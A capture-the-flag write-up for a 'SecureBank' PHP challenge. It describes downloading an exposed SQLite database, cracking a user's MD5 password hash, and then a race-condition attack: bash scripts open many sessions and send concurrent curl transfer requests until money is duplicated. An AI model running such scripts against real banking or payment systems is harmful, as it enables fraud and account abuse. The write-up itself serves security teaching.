SecureBank has released a beta of their new banking portal. Can you take a look and see if it is secure?

🗄️ Files

👀 Enumeration

When I opened the website I saw the simple login page. I didn’t have any credentials, so I looked at the source code.

The first thing that I noticed was that error reporting was enabled in the index.php, but in the end, it was not key to solving this challenge.

error_reporting(E_ALL);
ini_set("display_errors", 1);

🔑 Credentials

Then I looked deeper and noticed, that server uses the SQLite database. I tried to fetch this database directly via the URL /bank.db, and it was accessible. The client table in the database contained credentials. The user was john and the password hash was 6579e96f76baa00787a28653876c6127. After cracking this hash with the crackstation I got the plaintext password johndoe.

The credentials worked on the login page, and I was successfully logged in and solved the first piece of the puzzle.

💰 Printing money

The restricted content contained a simple bank website where I was able to transfer money and see account transaction history with the current balance for each account. Our pwned account had 2 bank accounts - “transaction account” and “savings account”.

In the promo.php file I noticed the following line:

<p>Congratulations! You have saved 25 euro. Your gift code is <b><?=$_ENV["PROMOCODE"] ?></b></p>

This line was shown when in the bank account was more than 25 euros. I had 20 euros together. So this was the last key to get the flag?

In transfer.php was the logic behind transferring money. After reviewing the conditions for input validation it looked secure.

Before the SQL query which transferred the money was the following line:

$source_account_number = $_POST["source"];
$destination_account_number = $_POST["destination"];
$timestamp = time();
$hash = $amount . $source_account_number . $destination_account_number . $timestamp;
for ($i = 0; $i < 3000000; $i++) {
    $hash = sha1($hash);
}

These lines were really strange and doesn’t make sense. What came to my mind when I saw these lines was race condition.

0️⃣ First try

At first, I tried to send several requests at the same time by transferring 1 euro from one bank account to another. I wrote this small bash script:

#!/bin/bash

session="b95eb36da2fb8d33bea80e2ab4024c87"
challenge_session="3c135044636d6b2088bd76f7"

for session in {1..30}
do
  curl --silent \
  "https://${challenge_session}-securebank.challenge.master.cscg.live:31337/?page=transfer" \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --header "Cookie: PHPSESSID=${session}" \
  --data-raw "destination=EU88SECB00051380017&source=EU42SECB00051380016&amount=1.00" > /dev/null &
done

ℹ️ Notice the character & at the end.

When we looked at the transaction history I saw that my requests were resolved one by one.

1️⃣ Try harder!

But how can I force the server to execute these requests simultaneously? I noticed, that when I created a new session, the old one was still valid. After that, I got the idea. What will happen when I try to execute each request with a different session. I edited the bash script as follows:

#!/bin/bash

sessions=()
challenge_session="3c135044636d6b2088bd76f7"

for i in {0..30}
do
  session=$(
    curl --silent \
  	  --dump-header - --output /dev/null \
  	  "https://${challenge_session}-securebank.challenge.master.cscg.live:31337/index.php?page=login" \
  	  --header 'Content-Type: application/x-www-form-urlencoded' \
  	  --data-raw 'username=john&password=johndoe' | grep --only-matching --perl-regexp '(?<=PHPSESSID=).*?(?=;)'
  	)
  sessions+=("$session")
  echo "Session ${i}: ${session}"
done

for session in "${sessions[@]}"
do
  echo "Executing transaction with session ${session}"
  curl --silent \
    "https://${challenge_session}-securebank.challenge.master.cscg.live:31337/?page=transfer" \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --header "Cookie: PHPSESSID=${session}" \
    --data-raw "destination=EU88SECB00051380017&source=EU42SECB00051380016&amount=1.00" > /dev/null &
done

When I executed it, I got 46 euros in my savings account 🤑. When I tried to get the PROMOCODE I got the flag 🏴‍☠️!

Example image

I printed 21 euros from thin air like the ECB and FED 🤮. Got bless ₿itcoin.